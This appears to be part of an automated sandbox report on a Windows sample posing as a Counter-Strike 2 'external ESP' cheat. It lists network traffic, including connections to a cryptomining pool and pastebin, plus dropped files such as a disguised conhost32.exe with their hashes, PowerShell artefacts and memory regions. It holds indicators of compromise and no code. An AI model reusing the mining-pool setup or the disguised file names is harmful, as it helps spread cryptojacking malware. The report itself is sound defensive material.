US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:5555 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
DE 95.179.241.203:5555 pool.hashvault.pro tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\conhost32.exe

MD5 0ca285f9a8c43016ffe109a13b0e07a0
SHA1 a03f79912ab0fbfd10ee3ff67bff60671a8ad42f
SHA256 880123a7fac24705ffb6795713d32fdc21679ac00802e72cb54d86814be4fcf1
SHA512 b68ee3e6b8499ca4995390d8c614784d13629a326bbac0c9d258813723428cbd830021e68bd78f7ca7d8330c0eeb1b28405f29bb967349a205c98973086ef883

C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe

MD5 dfae04e92d343bd110609b8194816131
SHA1 d1b1f02cb02273f56eef010a52072f6c6a23f071
SHA256 807999620cb4783d5c8f282cc21a6c5829e9f99719cbcdb7a71bdacd58671daa
SHA512 6083ae949fef7c09102ac2d1fd6da30ec38b6044a9fe258a64ec07178cf5a180158a0fda32f76b76d14cff6653a8a17f8a5f15c747625be4a42fe015f48dc2fe

memory/804-8-0x000000007261E000-0x000000007261F000-memory.dmp

memory/804-13-0x0000000001180000-0x00000000011B6000-memory.dmp

memory/804-15-0x0000000007150000-0x0000000007778000-memory.dmp

memory/804-14-0x0000000072610000-0x0000000072CFE000-memory.dmp

memory/804-16-0x0000000007020000-0x0000000007042000-memory.dmp

memory/804-17-0x00000000078F0000-0x0000000007956000-memory.dmp

memory/804-18-0x0000000007960000-0x00000000079C6000-memory.dmp

memory/804-21-0x0000000007AC0000-0x0000000007E10000-memory.dmp

memory/804-25-0x0000000007880000-0x000000000789C000-memory.dmp

memory/804-26-0x0000000008090000-0x00000000080DB000-memory.dmp

memory/804-30-0x00000000081D0000-0x0000000008246000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqv544na.qto.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/804-56-0x0000000009190000-0x00000000091AE000-memory.dmp

memory/804-61-0x0000000009210000-0x00000000092B5000-memory.dmp

memory/804-55-0x0000000073000000-0x000000007304B000-memory.dmp

memory/804-54-0x00000000091D0000-0x0000000009203000-memory.dmp

memory/804-62-0x00000000094C0000-0x0000000009554000-memory.dmp

memory/804-260-0x0000000009460000-0x000000000947A000-memory.dmp

memory/804-265-0x0000000009450000-0x0000000009458000-memory.dmp

memory/804-281-0x0000000072610000-0x0000000072CFE000-memory.dmp

memory/2948-282-0x00007FF73C9A0000-0x00007FF73CF5C000-memory.dmp

memory/4432-288-0x0000022449350000-0x0000022449372000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 84b947076ff79194bd2f2539c80d2fac
SHA1 154b54aa34a1521d59d373bae20197426707d285
SHA256 858af83202a048447e425f4d815fd8faadbe060aa0777c0c1743f577f7b9ff92
SHA512 dd42a4187f5e806690aeb2f49734da7199e09f92f07125dd9b26aa2da2b8bb3b74db2b2fe3d2a83f75ab900731a1a1bc808923df80b1e239cd43b841499f701f

memory/4432-291-0x0000022449500000-0x0000022449576000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4e36cd1fa1e00c532cb82880a8a6097d
SHA1 2d5a84ef221b0d5637fb854f68eef69d36065c15
SHA256 f55e8fb411153ce462b5e7cbe4c2e362bb4a73dcaff6e2905aea6eab5a4fb8ca
SHA512 4910cec0f2ea8c9b1490fa1d95369d97bf8ff80840454ecea0ed50d9427a421fdb5bc914c86a05f92574211a4c7a3f429acbfd950c6d8411ef6fa31fabd2a2e6

memory/3456-331-0x00007FFFED230000-0x00007FFFED2DE000-memory.dmp

memory/3456-330-0x00007FFFEFCB0000-0x00007FFFEFE8B000-memory.dmp

memory/640-346-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp

memory/1008-363-0x000002724A5C0000-0x000002724A5E7000-memory.dmp

memory/736-402-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp

memory/736-400-0x000002AE84820000-0x000002AE84847000-memory.dmp

memory/1008-364-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp

memory/640-345-0x0000021429E40000-0x0000021429E67000-memory.dmp

memory/584-343-0x0000014C6CE40000-0x0000014C6CE61000-memory.dmp

memory/584-342-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp

memory/584-341-0x0000014C6D230000-0x0000014C6D257000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1d2d913c3dc74c96a90c5f53810a4258
SHA1 2ec54878f305c68ff23a03c612563267704db95e
SHA256 54d6b3b1c9dc258b5ffcdb51148e5c31131d5824d8ce43b78998c3a812b965e9
SHA512 8a93c9b24aad835b7a10d8b511b5a8c07f19bcc426b1c15f1b5643822ccc1bdd045e2ea8fd3e5094c00320b9fe45b3cc70700e155992aaca4093c81e349e6853

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bbb673277fae96ee4bc299672085e949
SHA1 731ccb1581a06bff2ca36ca46b20c91c9adc468c
SHA256 21a0a3c47eb15cec5d37688a67369836fda0164d0cd5afaa9a2aa52fb838685d
SHA512 aa0efc1683991ed68027f0fbd1dfcf0616dd0c328bd015cb43987411e454e0583e8cc1a45bc9f689e873007071e0923d9be10a6db689ba268a167f856b6a8425